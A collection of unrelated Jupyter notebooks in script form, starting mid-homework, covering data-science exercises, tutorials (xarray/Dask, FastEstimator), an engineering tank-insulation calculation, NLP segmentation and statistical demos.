# **Question 4.** The file `sales.csv` contains the number of fruit sold from each box last Saturday. It has an extra column called "price per fruit (\$)" that's the price *per item of fruit* for fruit in that box. The rows are in the same order as the `inventory` table. Load these data into a table called `sales`.
sales = Table.read_table("sales.csv")
sales
_ = ok.grade('q7_4')
# **Question 5.** How many fruits did the store sell in total on that day?
total_fruits_sold = np.cumsum(sales.column("count sold"))[7]
total_fruits_sold
_ = ok.grade('q7_5')
# **Question 6.** What was the store's total revenue (the total price of all fruits sold) on that day?
#
# *Hint:* If you're stuck, think first about how you would compute the total revenue from just the grape sales.
total_revenue = sum(sales.column("count sold") *
sales.column("price per fruit ($)"))
total_revenue
_ = ok.grade('q7_6')
# **Question 7.** Make a new table called `remaining_inventory`. It should have the same rows and columns as `inventory`, except that the amount of fruit sold from each box should be subtracted from that box's count, so that the "count" is the amount of fruit remaining after Saturday.
# +
remaining_inventory = inventory.with_columns("count",
(inventory.column("count") - sales.column("count sold")))
remaining_inventory
# -
_ = ok.grade('q7_7')
# ## 8. Submission
#
# Once you're finished, select "Save and Checkpoint" in the File menu and then execute the `submit` cell below. The result will contain a link that you can use to check that your assignment has been submitted successfully. If you submit more than once before the deadline, we will only grade your final submission.
_ = ok.submit()
|
hw02.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <img src="images/tensorflow.jpg">
# ## Exercise 1.
#
# #### Display the number of letters in the string
#
my_word = "<PASSWORD>"
print(#yourcode)
# ## Exercise 2.
#
# #### Display two strings together, with a space in between. Then assign it in variable
#
#
# +
string_one = "tensorflow"
string_two = "azerbaijan"
combined = #yourcode
print(combined)
# -
# ## Exercise 3.
#
# #### Display "Azerbaijan" substring of a string
#
#
#
my_word = "<PASSWORD>"
print(#yourcode)
# ## Exercise 4.
#
# #### Display string as "TensorFlowAzerbaijan" by using capitalize() function.
#
#
#
my_word = "<PASSWORD>"
# ## Exercise 5.
#
# #### Use two numbers and calculate their power
base = 5
exponent = 3
result = # your code
print(base,"to the power of",exponent, " = ",result)
# ## Exercise 6.
#
#
# #### Display string as "TensorFlow Azerbaijan"
my_word = "tensorflow<PASSWORD>"
# ## OPTIONAL: Exercise 7.
#
# #### Implement sigmoid function in Python.
#
# The exp() function in Python allows users to calculate the exponential value with the base set to e. The function takes as input the exponent value. The general syntax of the function is:
#
# `math.exp(exponent)`
#
# Python number method exp() returns returns exponential of x: $e^x$ .
#
#
#
# In this exercise, you should implement sigmoid function in Python. Basically, the Sigmoid Function returns a value between 1 and 0, this is too powerful for Binary Classification Problems.
#
# <img src="images/sigmoid.png">
#
# For calculating the exponential value in Python, you can refer: https://www.tutorialspoint.com/python/number_exp.htm
#
# For learning more about sigmoid function, you can read:
#
# 1.https://machinelearningmastery.com/a-gentle-introduction-to-sigmoid-function/
#
# 2.https://medium.com/@gabriel.mayers/sigmoid-function-explained-in-less-than-5-minutes-ca156eb3049a
math.exp(1)
# +
import math # This will import math module
x=2
print(1/(1 + #yourcode))
# answer should be: 0.8807970779778823
|
homework_week_1/1. Homework.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
from sympy import *
import numpy as np
# +
def m_to_in(arg):
return arg*39.3701
def in_to_m(arg):
return arg/39.3701
# -
# ### Inputs:
P_tanks = 1.379e+6 # Pressure in tanks, Pascals (200 PSI)
# Pressure_Tanks = 101325*2; # Pascals (2ATM)
D_tanks = in_to_m(10) # Diameter of tanks, meters (12 inches)
T_cryo = 90.15 # Kevlin *CHANGE ME* ACCORDING TO WHICH CRYOGRENIC FUEL YOU WANT TO EXAMINE
T3 = 270 # Kelvin * CHANGE ME* ACCORDING TO VEHICLE SIZING
# ### Constants:
# +
simgay_al = 324e+6 # Tensile_Strength_Yield_Al_6061T, Pascals (4700 PSI) @ 77.15 K -196 Celsius
# Tensile Chosen because structure will be in tension.
# http://www.matweb.com/search/datasheet_print.aspx?matguid=1b8c06d0ca7c456694c7777d9e10be5b
K_CFRP = 7.0 # CFRP Thermal Conductivity, Watts/Meter Kelvin
K_PU = 0.025 # Polyurethane_Thermal_Conductivity, Watts/Meter Kelvin
T_ambient = 299.15 # Kelvin
H = 35 # Convective Heat Transfer Coefficient, Watts/SQR Meter Kelvin
FS = 1.5 # Safety Factor
# -
# ### Calculations:
# +
R1 = D_tanks /2
t = Symbol('t')
R = Symbol('R')
t_al = solve((P_tanks*D_tanks)/(4*t) - simgay_al, t) # thickness of aluminum, meters
t_al = float(t_al[0]) # convert to floating point number
t_al = 0.00635
R2 = R1 + 1.5 * t_al # Meters
T2 = T_cryo # Kelvin Assumption: WORST CASE
L = 1.0
R_soln = solve(2*np.pi*R*L*H*(T_ambient-T3) - ((2*pi*L)*K_PU*(T3-T2)/log(R/R2)), R)
print('Thickness Aluminum:', m_to_in(t_al), 'in')
print('Radius3:', m_to_in(R_soln[0]), 'in')
print('Thickness of Polyurethane:', m_to_in(R_soln[0]-R2), 'in')
# -
|
jupyter/TPS_tanks.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# # Xarray with Dask Arrays
#
# <img src="images/dataset-diagram-logo.png"
# align="right"
# width="66%"
# alt="Xarray Dataset">
#
# **[Xarray](http://xarray.pydata.org/en/stable/)** is an open source project and Python package that extends the labeled data functionality of [Pandas](https://pandas.pydata.org/) to N-dimensional array-like datasets. It shares a similar API to [NumPy](http://www.numpy.org/) and [Pandas](https://pandas.pydata.org/) and supports both [Dask](https://dask.org/) and [NumPy](http://www.numpy.org/) arrays under the hood.
# +
# %matplotlib inline
from dask.distributed import Client
import xarray as xr
# -
# ## Start Dask Client for Dashboard
#
# Starting the Dask Client is optional. It will provide a dashboard which
# is useful to gain insight on the computation.
#
# The link to the dashboard will become visible when you create the client below. We recommend having it open on one side of your screen while using your notebook on the other side. This can take some effort to arrange your windows, but seeing them both at the same is very useful when learning.
client = Client(n_workers=8, threads_per_worker=2, memory_limit='1GB')
client
# ## Open a sample dataset
#
# We will use some of xarray's tutorial data for this example. By specifying the chunk shape, xarray will automatically create Dask arrays for each data variable in the `Dataset`. In xarray, `Datasets` are dict-like container of labeled arrays, analogous to the `pandas.DataFrame`. Note that we're taking advantage of xarray's dimension labels when specifying chunk shapes.
ds = xr.tutorial.open_dataset('air_temperature',
chunks={'lat': 25, 'lon': 25, 'time': -1})
ds
# Quickly inspecting the `Dataset` above, we'll note that this `Dataset` has three _dimensions_ akin to axes in NumPy (`lat`, `lon`, and `time`), three _coordinate variables_ akin to `pandas.Index` objects (also named `lat`, `lon`, and `time`), and one data variable (`air`). Xarray also holds Dataset specific metadata in as _attributes_.
da = ds['air']
da
# Each data variable in xarray is called a `DataArray`. These are the fundemental labeled array object in xarray. Much like the `Dataset`, `DataArrays` also have _dimensions_ and _coordinates_ that support many of its label-based opperations.
da.data
# Accessing the underlying array of data is done via the `data` property. Here we can see that we have a Dask array. If this array were to be backed by a NumPy array, this property would point to the actual values in the array.
# ## Use Standard Xarray Operations
#
# In almost all cases, operations using xarray objects are identical, regardless if the underlying data is stored as a Dask array or a NumPy array.
da2 = da.groupby('time.month').mean('time')
da3 = da - da2
da3
# Call `.compute()` or `.load()` when you want your result as a `xarray.DataArray` with data stored as NumPy arrays.
#
# If you started `Client()` above then you may want to watch the status page during computation.
computed_da = da3.load()
type(computed_da.data)
computed_da
# ## Persist data in memory
#
# If you have the available RAM for your dataset then you can persist data in memory.
#
# This allows future computations to be much faster.
da = da.persist()
# ## Time Series Operations
#
# Because we have a datetime index time-series operations work efficiently. Here we demo the use of xarray's resample method:
da.resample(time='1w').mean('time').std('time')
da.resample(time='1w').mean('time').std('time').load().plot(figsize=(12, 8))
# and rolling window operations:
da_smooth = da.rolling(time=30).mean().persist()
da_smooth
# Since xarray stores each of its coordinate variables in memory, slicing by label is trivial and entirely lazy.
# %time da.sel(time='2013-01-01T18:00:00')
# %time da.sel(time='2013-01-01T18:00:00').load()
# ## Custom workflows and automatic parallelization
# Almost all of xarray’s built-in operations work on Dask arrays. If you want to use a function that isn’t wrapped by xarray, one option is to extract Dask arrays from xarray objects (.data) and use Dask directly.
#
# Another option is to use xarray’s `apply_ufunc()` function, which can automate embarrassingly parallel “map” type operations where a functions written for processing NumPy arrays should be repeatedly applied to xarray objects containing Dask arrays. It works similarly to `dask.array.map_blocks()` and `dask.array.atop()`, but without requiring an intermediate layer of abstraction.
#
# Here we show an example using NumPy operations and a fast function from `bottleneck`, which we use to calculate Spearman’s rank-correlation coefficient:
# +
import numpy as np
import xarray as xr
import bottleneck
def covariance_gufunc(x, y):
return ((x - x.mean(axis=-1, keepdims=True))
* (y - y.mean(axis=-1, keepdims=True))).mean(axis=-1)
def pearson_correlation_gufunc(x, y):
return covariance_gufunc(x, y) / (x.std(axis=-1) * y.std(axis=-1))
def spearman_correlation_gufunc(x, y):
x_ranks = bottleneck.rankdata(x, axis=-1)
y_ranks = bottleneck.rankdata(y, axis=-1)
return pearson_correlation_gufunc(x_ranks, y_ranks)
def spearman_correlation(x, y, dim):
return xr.apply_ufunc(
spearman_correlation_gufunc, x, y,
input_core_dims=[[dim], [dim]],
dask='parallelized',
output_dtypes=[float])
# -
# In the examples above, we were working with an some air temperature data. For this example, we'll calculate the spearman correlation using the raw air temperature data with the smoothed version that we also created (`da_smooth`). For this, we'll also have to rechunk the data ahead of time.
corr = spearman_correlation(da.chunk({'time': -1}),
da_smooth.chunk({'time': -1}),
'time')
corr
corr.plot(figsize=(12, 8))
|
Spring_2019/LB29/xarray_DASKTUT.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# pre-analysis:
# tags: single tag stats; overlapped tag stats; recipe with multiple tags;
# instruction data: 长度;词频统计; (分类做)
original = pd.read_csv('/Users/hetianbai/Desktop/Plated/nyu_recipe_data.csv')
original.info()
df = pd.read_csv('/Users/hetianbai/Desktop/Plated/cleaned_recipe_data.csv')
df.info()
# total number of recipes:
print('total number of recipes:',df.shape[0])
# total number of tags:
print('total number of tags:',tags.shape[1]+2)
print('total number of tags in model:',tags.shape[1])
# Removed very rare tags: tag_cuisine_nordic, tag_cuisine_african
data = df[['carbs', 'fat','title',
'protein','calories', 'step_one', 'step_two', 'step_three',
'step_four', 'step_five', 'step_six',
'tag_cuisine_indian',
'tag_cuisine_asian', 'tag_cuisine_mexican',
'tag_cuisine_latin-american', 'tag_cuisine_french',
'tag_cuisine_italian',
'tag_cuisine_mediterranean', 'tag_cuisine_american',
'tag_cuisine_middle-eastern']]
data.columns = [['carbs', 'fat','title',
'protein','calories', 'step_one', 'step_two', 'step_three',
'step_four', 'step_five', 'step_six', 'Indian', 'Asian', 'Mexican','Latin-american',\
'French','Italian','Mediterranean','American','Middle-eastern']]
tags = data[['Indian', 'Asian', 'Mexican','Latin-american',\
'French','Italian','Mediterranean','American','Middle-eastern']]
tags_sum = pd.DataFrame(np.sum(tags,axis=0), columns=['counts'])
tags_sum
# +
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
rs = np.random.RandomState(8)
# Set up the matplotlib figure
f, ax = plt.subplots(figsize=(14,8))
# Generate some sequential data
x = np.array(tags_sum.index)
y = np.array(tags_sum.counts)
sns.barplot(x, y,color="steelblue", ax=ax)
ax.set_ylabel("Number of recipe")
ax.set_xlabel("Cuisines")
plt.title('Number of Recipes by Cuisines')
# -
# Recipe with mutliple tags:
tags['sum'] = np.array(np.sum(tags,axis=1))
tags = tags[tags['sum']>0]
tags_multi = tags[tags['sum']>1]
del tags_multi['sum']
annot_count = np.zeros([9,9])
for i, tag1 in enumerate(list(tags_sum.index)):
for j, tag2 in enumerate(list(tags_sum.index)):
if i==j:
annot_count[i][j] = int((np.array(np.sum(tags_multi[[tag1]],axis=1))>0).sum())
else:
annot_count[i][j] = int((np.array(np.sum(tags_multi[[tag1,tag2]],axis=1))>1).sum())
for i, tag in enumerate(list(tags_sum.index)):
annot_count[i][i] = int(tags[tags[tag]==1].shape[0])
# heat map of recipe with maltiple tags
plt.figure(figsize = (12,12))
sns.set(font_scale=1.5)
sns.heatmap(tags_multi.corr(method='pearson', min_periods=1), annot = annot_count, vmax=.4, square=True, annot_kws={"size": 16})
def count_length(col):
length = np.zeros(len(data[col]))
for i,v in enumerate(list(data[col].values)):
if isinstance(v, float):
length[i] = 0
else:
length[i] = len(v.split())
return length
# +
for col in ['step_one', 'step_two', 'step_three', 'step_four', 'step_five', 'step_six']:
n = col+'_length'
data[n]=count_length(col)
data['mean_length'] = data.iloc[:, -7:-1].mean(axis=1)
# -
sns.set_style("white")
plt.figure(figsize = (12,8))
for tag in list(tags_sum.index):
sns.distplot(data[data[tag]>0]['mean_length'], bins=50, label= tag, hist=False);
plt.legend()
plt.xlabel('Instruction Length')
plt.title('Instruction Length distribution by Cuisine')
# ### Single Tag statistics:
for tag in list(tags_sum.index):
print('>>>>>', tag)
print('* Numer of recipes', tags_sum.loc[tag].values)
print('* Average Instruction length:', np.mean(data[data[tag] > 0]['mean_length']))
# print('* Calories:', np.mean(int(data[data[tag] > 0]['calories'])))
# ### High frequent word statistics:
# +
import string
import pickle as pkl
import random
from collections import Counter, defaultdict
from nltk.tokenize import word_tokenize
from collections import Counter
# lowercase and remove punctuation
def tokenizer(sent):
#print(sent)
if pd.isnull(sent):
words = []
else:
table = str.maketrans(string.punctuation, ' '*len(string.punctuation))
sent = sent.translate(table)
tokens = word_tokenize(sent)
# convert to lower case
tokens = [w.lower() for w in tokens]
# remove punctuation from each word
#table = str.maketrans('', '', string.punctuation)
#stripped = [w.translate(table) for w in tokens]
# remove remaining tokens that are not alphabetic
words = [word for word in tokens if word.isalpha()]
#re.findall(r'\d+', 'sdfa')
return words
def tokenize_dataset(step_n):
"""returns tokenization for each step, training set tokenizatoin"""
token_dataset = []
for sample in step_n:
tokens = tokenizer(sample)
token_dataset.extend(tokens)
return token_dataset
# -
for tag in list(tags_sum.index):
words_bucket = []
for step in ['step_one', 'step_two', 'step_three', 'step_four', 'step_five', 'step_six']:
words_bucket.extend(tokenize_dataset(data[data[tag] > 0][step]))
ordered_dict = Counter(words_bucket)
print(tag)
print(ordered_dict.most_common(260)[20:])
|
src/data/.ipynb_checkpoints/Plated Instruction Data Pre-Analysis-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Tutorial 7: Estimator
#
# ## Overview
# In this tutorial, we will talk about:
# * [Estimator API](#t07estimator)
# * [Reducing the number of training steps per epoch](#t07train)
# * [Reducing the number of evaluation steps per epoch](#t07eval)
# * [Changing logging behavior](#t07logging)
# * [Monitoring intermediate results during training](#t07intermediate)
# * [Trace](#t07trace)
# * [Concept](#t07concept)
# * [Structure](#t07structure)
# * [Usage](#t07usage)
# * [Model Testing](#t07testing)
# * [Related Apphub Examples](#t07apphub)
# `Estimator` is the API that manages everything related to the training loop. It combines `Pipeline` and `Network` together and provides users with fine-grain control over the training loop. Before we demonstrate different ways to control the training loop let's define a template similar to [tutorial 1](./t01_getting_started.ipynb), but this time we will use a PyTorch model.
# +
import fastestimator as fe
from fastestimator.architecture.pytorch import LeNet
from fastestimator.dataset.data import mnist
from fastestimator.op.numpyop.univariate import ExpandDims, Minmax
from fastestimator.op.tensorop.loss import CrossEntropy
from fastestimator.op.tensorop.model import ModelOp, UpdateOp
import tempfile
def get_estimator(log_steps=100, monitor_names=None, use_trace=False, max_train_steps_per_epoch=None, epochs=2):
# step 1
train_data, eval_data = mnist.load_data()
test_data = eval_data.split(0.5)
pipeline = fe.Pipeline(train_data=train_data,
eval_data=eval_data,
test_data=test_data,
batch_size=32,
ops=[ExpandDims(inputs="x", outputs="x", axis=0), Minmax(inputs="x", outputs="x")])
# step 2
model = fe.build(model_fn=LeNet, optimizer_fn="adam", model_name="LeNet")
network = fe.Network(ops=[
ModelOp(model=model, inputs="x", outputs="y_pred"),
CrossEntropy(inputs=("y_pred", "y"), outputs="ce"),
CrossEntropy(inputs=("y_pred", "y"), outputs="ce1"),
UpdateOp(model=model, loss_name="ce")
])
# step 3
traces = None
if use_trace:
traces = [Accuracy(true_key="y", pred_key="y_pred"),
BestModelSaver(model=model, save_dir=tempfile.mkdtemp(), metric="accuracy", save_best_mode="max")]
estimator = fe.Estimator(pipeline=pipeline,
network=network,
epochs=epochs,
traces=traces,
max_train_steps_per_epoch=max_train_steps_per_epoch,
log_steps=log_steps,
monitor_names=monitor_names)
return estimator
# -
# Let's train our model using the default `Estimator` arguments:
est = get_estimator()
est.fit()
# <a id='t07estimator'></a>
# ## Estimator API
# <a id='t07train'></a>
# ### Reduce the number of training steps per epoch
# In general, one epoch of training means that every element in the training dataset will be visited exactly one time. If evaluation data is available, evaluation happens after every epoch by default. Consider the following two scenarios:
#
# * The training dataset is very large such that evaluation needs to happen multiple times during one epoch.
# * Different training datasets are being used for different epochs, but the number of training steps should be consistent between each epoch.
#
# One easy solution to the above scenarios is to limit the number of training steps per epoch. For example, if we want to train for only 300 steps per epoch, with training lasting for 4 epochs (1200 steps total), we would do the following:
est = get_estimator(max_train_steps_per_epoch=300, epochs=4)
est.fit()
# <a id='t07eval'></a>
# ### Reduce the number of evaluation steps per epoch
# One may need to reduce the number of evaluation steps for debugging purpose. This can be easily done by setting the `max_eval_steps_per_epoch` argument in `Estimator`.
# <a id='t07logging'></a>
# ### Change logging behavior
# When the number of training epochs is large, the log can become verbose. You can change the logging behavior by choosing one of following options:
# * set `log_steps` to `None` if you do not want to see any training logs printed.
# * set `log_steps` to 0 if you only wish to see the evaluation logs.
# * set `log_steps` to some integer 'x' if you want training logs to be printed every 'x' steps.
#
# Let's set the `log_steps` to 0:
est = get_estimator(max_train_steps_per_epoch=300, epochs=4, log_steps=0)
est.fit()
# <a id='t07intermediate'></a>
# ### Monitor intermediate results
# You might have noticed that in our example `Network` there is an op: `CrossEntropy(inputs=("y_pred", "y") outputs="ce1")`. However, the `ce1` never shows up in the training log above. This is because FastEstimator identifies and filters out unused variables to reduce unnecessary communication between the GPU and CPU. On the contrary, `ce` shows up in the log because by default we log all loss values that are used to update models.
#
# But what if we want to see the value of `ce1` throughout training?
#
# Easy: just add `ce1` to `monitor_names` in `Estimator`.
est = get_estimator(max_train_steps_per_epoch=300, epochs=4, log_steps=150, monitor_names="ce1")
est.fit()
# As we can see, both `ce` and `ce1` showed up in the log above. Unsurprisingly, their values are identical because because they have the same inputs and forward function.
# <a id='t07trace'></a>
# ## Trace
# <a id='t07concept'></a>
# ### Concept
# Now you might be thinking: 'changing logging behavior and monitoring extra keys is cool, but where is the fine-grained access to the training loop?'
#
# The answer is `Trace`. `Trace` is a module that can offer you access to different training stages and allow you "do stuff" with them. Here are some examples of what a `Trace` can do:
#
# * print any training data at any training step
# * write results to a file during training
# * change learning rate based on some loss conditions
# * calculate any metrics
# * order you a pizza after training ends
# * ...
#
# So what are the different training stages? They are:
#
# * Beginning of training
# * Beginning of epoch
# * Beginning of batch
# * End of batch
# * End of epoch
# * End of training
#
# <img src="../resources/t07_trace_concept.png" alt="drawing" width="500"/>
#
# As we can see from the illustration above, the training process is essentially a nested combination of batch loops and epoch loops. Over the course of training, `Trace` places 6 different "road blocks" for you to leverage.
# <a id='t07structure'></a>
# ### Structure
# If you are familiar with Keras, you will notice that the structure of `Trace` is very similar to the `Callback` in keras. Despite the structural similarity, `Trace` gives you a lot more flexibility which we will talk about in depth in [advanced tutorial 4](../advanced/t04_trace.ipynb). Implementation-wise, `Trace` is a python class with the following structure:
class Trace:
def __init__(self, inputs=None, outputs=None, mode=None):
self.inputs = inputs
self.outputs = outputs
self.mode = mode
def on_begin(self, data):
"""Runs once at the beginning of training"""
def on_epoch_begin(self, data):
"""Runs at the beginning of each epoch"""
def on_batch_begin(self, data):
"""Runs at the beginning of each batch"""
def on_batch_end(self, data):
"""Runs at the end of each batch"""
def on_epoch_end(self, data):
"""Runs at the end of each epoch"""
def on_end(self, data):
"""Runs once at the end training"""
# Given the structure, users can customize their own functions at different stages and insert them into the training loop. We will leave the customization of `Traces` to the advanced tutorial. For now, let's use some pre-built `Traces` from FastEstimator.
#
# During the training loop in our earlier example, we want 2 things to happen:
# 1. Save the model weights if the evaluation loss is the best we have seen so far
# 2. Calculate the model accuracy during evaluation
# <a id='t07usage'></a>
# +
from fastestimator.trace.io import BestModelSaver
from fastestimator.trace.metric import Accuracy
est = get_estimator(use_trace=True)
est.fit()
# -
# As we can see from the log, the model is saved in a predefined location and the accuracy is displayed during evaluation.
# <a id='t07testing'></a>
# ## Model Testing
#
# Sometimes you have a separate testing dataset other than training and evaluation data. If you want to evalate the model metrics on test data, you can simply call:
est.test()
# This will feed all of your test dataset through the `Pipeline` and `Network`, and finally execute the traces (in our case, compute accuracy) just like during the training.
# <a id='t07apphub'></a>
# ## Apphub Examples
# You can find some practical examples of the concepts described here in the following FastEstimator Apphubs:
#
# * [UNet](../../apphub/semantic_segmentation/unet/unet.ipynb)
|
tutorial/beginner/t07_estimator.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Redução de dimensionalidade
# Nesta etapa será feita a redução de dimensionalidade antes do treinamento dos modelos de machine learning.
import numpy as np
from sklearn.decomposition import SparsePCA
from scipy import sparse
X_train_blc_sparse = sparse.load_npz('data_files/X_train_blc_sparse.npz')
type(X_train_blc_sparse)
X_train_balanced = X_train_blc_sparse.toarray()
type(X_train_balanced)
X_train_balanced.shape
# ## Decomposição com o método PCA
# Foi aplicado o método de *principal component analysis (PCA)* para redução de dimensionalidade do dataset de treino.
pca = SparsePCA(n_components=0.95)
X_train_pca = pca.fit_transform(X_train_balanced)
|
.ipynb_checkpoints/05-Reducao_dimensionalidade-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# # Example of using IIS
# ## Define a model to estimate
# +
from scipy.stats import norm, uniform
from iis import IIS, Model
def mymodel(params):
"""User-defined model with two parameters
Parameters
----------
params : numpy.ndarray 1-D
Returns
-------
state : float
return value (could also be an array)
"""
return params[0] + params[1]*2
likelihood = norm(loc=1, scale=1) # normal, univariate distribution mean 1, s.d. 1
prior = [norm(loc=0, scale=10), uniform(loc=-10, scale=20)]
model = Model(mymodel, likelihood, prior=prior) # define the model
# -
# ## Estimate its parameters
solver = IIS(model)
ensemble = solver.estimate(size=500, maxiter=10)
# ## Investigate results
#
# The IIS class has two attributes of interests:
# - `ensemble` : current ensemble
# - `history` : list of previous ensembles
#
# And a `to_panel` method to vizualize the data as a pandas Panel.
#
# The Ensemble class has following attributes of interest:
# - `state` : 2-D ndarray (samples x state variables)
# - `params` : 2-D ndarray (samples x parameters)
# - `model` : the model defined above, with target distribution and forward integration functions
#
# For convenience, it is possible to extract these field as pandas DataFrame or Panel, combining `params` and `state`. See in-line help for methods `Ensemble.to_dataframe` and `IIS.to_panel`. This feature requires having
# `pandas` installed.
#
# Two plotting methods are also provided: `Ensemble.scatter_matrix` and `IIS.plot_history`.
# The first is simply a wrapper around pandas' function, but it is so frequently used that it is added
# as a method.
# Use pandas to check out the quantiles of the final ensemble
ensemble.to_dataframe().quantile([0.5, 0.05, 0.95])
# or the iteration history
solver.to_panel(quantiles=[0.5, 0.05, 0.95])
# ##Check convergence
# Plotting methods
# %matplotlib inline
solver.plot_history(overlay_dists=True)
# ## Scatter matrix to investigate final distributions and correlations
ensemble.scatter_matrix() # result
# ## Advanced vizualisation using pandas (classes)
#
# Pandas is also shipped with a few methods to investigates clusters in data.
# The `categories` key-word has been included to `Ensemble.to_dataframe` to automatically
# add a column with appropriate categories.
# +
from pandas.tools.plotting import parallel_coordinates, radviz, andrews_curves
import matplotlib.pyplot as plt
# create clusters of data
categories = []
for i in xrange(ensemble.size):
if ensemble.params[i,0]>0:
cat = 'p0 > 0'
elif ensemble.params[i,0] > -5:
cat = 'p0 < 0 and |p0| < 5'
else:
cat = 'rest'
categories.append(cat)
# Create a DataFrame with a category name
class_column = '_CatName'
df = ensemble.to_dataframe(categories=categories, class_column=class_column)
plt.figure()
parallel_coordinates(df, class_column)
plt.title("parallel_coordinates")
plt.figure()
radviz(df, class_column)
plt.title("radviz")
|
notebooks/examples.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
"""Shrink the triangulation of a mesh to make the inside visible."""
from vedo import *
embedWindow('ipyvtk') # or k3d or panel
pot = load(datadir+"teapot.vtk").shrink(0.75)
s = Sphere(r=0.2).pos(0, 0, -0.5)
plt = show(pot, s, viewup='z')
# -
plt.close()
|
examples/notebooks/basic/shrink.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# +
# -*- coding: utf-8 -*-
import os
LTP_DATA_DIR = '/Users/lipingzhang/Desktop/program/jd/jd_crm/jd_crm/data_prepare/ltp_data_v3.4.0/' # ltp模型目录的路径
cws_model_path = os.path.join(LTP_DATA_DIR, 'cws.model') # 分词模型路径,模型名称为`cws.model`
from pyltp import Segmentor
segmentor = Segmentor() # 初始化实例
segmentor.load(cws_model_path) # 加载模型
words = segmentor.segment('元芳你怎么看') # 分词
print '\t'.join(words)
segmentor.release() # 释放模型
# -
# -*- coding: utf-8 -*-
from pyltp import SentenceSplitter
sents = SentenceSplitter.split('元芳你怎么看?我就趴窗口上看呗!') # 分句
print '\n'.join(sents)
# +
# -*- coding: utf-8 -*-
import os
LTP_DATA_DIR = '/Users/lipingzhang/Desktop/program/jd/jd_crm/jd_crm/data_prepare/ltp_data_v3.4.0/' # ltp模型目录的路径
pos_model_path = os.path.join(LTP_DATA_DIR, 'pos.model') # 词性标注模型路径,模型名称为`pos.model`
from pyltp import Postagger
postagger = Postagger() # 初始化实例
postagger.load(pos_model_path) # 加载模型
words = ['元芳', '你', '怎么', '看'] # 分词结果
postags = postagger.postag(words) # 词性标注
print '\t'.join(postags)
print list(postags)
postagger.release() # 释放模型
# -
cs = "cosine_sim_|及时:包装,高:性价比"
c = cs[len("cosine_sim_|"):]
print c
|
other/Untitled15.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .r
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: R
# language: R
# name: ir
# ---
# # Analysis example for exploring power law distributions
#
# In this notebook we explore power law distributions to gain familiarity with them.
#
# See https://www.nature.com/articles/srep00812 to recognize that mixtures of power laws do not, themselves, yield a power law! Also, if you take the bottom half of data from a power law, you will not get a power law.
#
# The original analysis is in github repo: https://github.com/carbocation/jupyter/blob/master/powerlaws.ipynb
# ## Setup
lapply(c('poweRlaw'),
function(pkg) { if(! pkg %in% installed.packages()) { install.packages(pkg)} } )
# +
GetRanks <- function(x) {
return(1+length(x)-seq(1, length(x)))
}
# Generate a vector with 5k power-law distributed values
# with scaling factor of 3, starting at 1
x <- poweRlaw::rpldis(50000, 1, 3, discrete_max=10000)
# -
# ## Plot the full distribution
(function() {
# Plot them. Note that the order (with regard to the rank of the x values) matters.
plot(GetRanks(x), sort(x), log="xy", xlab="Rank", ylab="Value", main="Log scale")
})()
# ## Take the bottom 95% of the distribution and see if it still looks like a power law (no)
(function() {
N <- 0.95*length(x)
#partials <- sort(x)[(length(x)-N):(length(x)-1)]
partials <- sort(x)[1:N]
plot(GetRanks(partials), sort(partials), log="xy", xlab="Rank", ylab="Value", main="Log scale")
})()
# ## Take the top 5% of the distribution and see if it still looks like a power law (yes)
(function() {
N <- 0.05*length(x)
partials <- sort(x)[(length(x)-N):(length(x)-1)]
plot(GetRanks(partials), sort(partials), log="xy", xlab="Rank", ylab="Value", main="Log scale")
})()
# # Provenance
devtools::session_info()
# Copyright 2018 The Broad Institute, Inc., Verily Life Sciences, LLC All rights reserved.
#
# This software may be modified and distributed under the terms of the BSD license. See the LICENSE file for details.
|
terra-notebooks-playground/R - Analysis example for exploring power law distributions.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %matplotlib inline
import matplotlib.pyplot as plt
import numpy as np
n_samples = 10000 #number of random samples to use
n_bins = 100 #number of bins for our histogram
sigma = 1.0 #rms width of the gaussian
mu = 0.0 #mean of the gaussian
x = np.random.normal(mu,sigma,n_samples)
print(x.min())
print(x.max())
def gaussian(x,mu,sigma):
return 1./(2.0*np.pi*sigma**2)**0.5 * np.exp(-0.5*((x-mu)/sigma)**2)
fig = plt.figure(figsize=(7,7))
y_hist, x_hist, ignored = plt.hist(x, bins=n_bins, range=[-5,5], density=True)
xx = np.linspace(-5.0,5.0,1000)
